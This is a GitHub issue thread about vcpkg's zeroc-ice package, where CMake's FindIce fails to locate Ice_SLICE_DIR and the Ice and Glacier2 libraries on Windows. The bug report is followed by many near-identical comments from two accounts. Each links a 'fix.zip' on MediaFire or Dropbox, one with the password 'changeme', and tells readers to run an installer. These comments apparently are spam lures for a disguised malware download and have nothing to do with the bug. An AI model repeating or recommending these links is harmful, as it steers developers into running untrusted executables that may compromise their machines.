### ISSUE TITLE
[zeroc-ice] Using find_package(Ice COMPONENTS Ice Glacier2 REQUIRED)  fails,  missing: Ice_SLICE_DIR

### ISSUE THREAD

**Issue by zhouniandi** [microsoft/vcpkg#40635]
**Describe the bug**
After installing zeroc-ice with vcpkg, missing: Ice_SLICE_DIR Ice_LIBRARY_Ice_REQUIRED_LIBS_FOUND by CMake.

**Environment**
- OS: OS: Windows11
- Compiler: MSVC 19.34.31943

**To Reproduce**
1. vcpkg install zeroc-ice
2. Write a CMake project and include the following lines:
```
find_package(Ice COMPONENTS Ice Glacier2 REQUIRED)
target_link_libraries(honeybee ${Boost_LIBRARIES} ${Ice_LIBRARIES} simdjson::simdjson unofficial::sqlite3::sqlite3 unordered_dense::unordered_dense croncpp::croncpp spdlog::spdlog)
```
3. Configure your project. CMake should give the following error: "Failed to find all Ice components (missing: Ice_SLICE_DIR)".

**Expected behavior**
 Failed to find all Ice components (missing: Ice_SLICE_DIR Ice_LIBRARY

**Failure logs**
  -- Ice version: 3.7.9
  -- The following Ice libraries were not found:
  --   Ice (required)
  --   Glacier2 (required)
  CMake Error at D:/Program Files/Microsoft Visual Studio/2022/Professional/Common7/IDE/CommonExtensions/Microsoft/CMake/CMake/share/cmake-3.28/Modules/FindPackageHandleStandardArgs.cmake:230 (message):
  -- Configuring incomplete, errors occurred!
    Failed to find all Ice components (missing: Ice_SLICE_DIR Ice_LIBRARY
    _Ice_REQUIRED_LIBS_FOUND) (found version "3.7.9")
  Call Stack (most recent call first):
    D:/Program Files/Microsoft Visual Studio/2022/Professional/Common7/IDE/CommonExtensions/Microsoft/CMake/CMake/share/cmake-3.28/Modules/FindPackageHandleStandardArgs.cmake:600 (_FPHSA_FAILURE_MESSAGE)
    D:/Program Files/Microsoft Visual Studio/2022/Professional/Common7/IDE/CommonExtensions/Microsoft/CMake/CMake/share/cmake-3.28/Modules/FindIce.cmake:544 (FIND_PACKAGE_HANDLE_STANDARD_ARGS)
    F:/vcpkg/scripts/buildsystems/vcpkg.cmake:859 (_find_package)
    CMakeLists.txt:11 (find_package)
  
  
  [0/1] Re-running CMake...
  FAILED: build.ninja 

全部生成 失败。

**Additional context**

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dg0yt** [comment]
I should re-start https://github.com/microsoft/vcpkg/pull/33648.
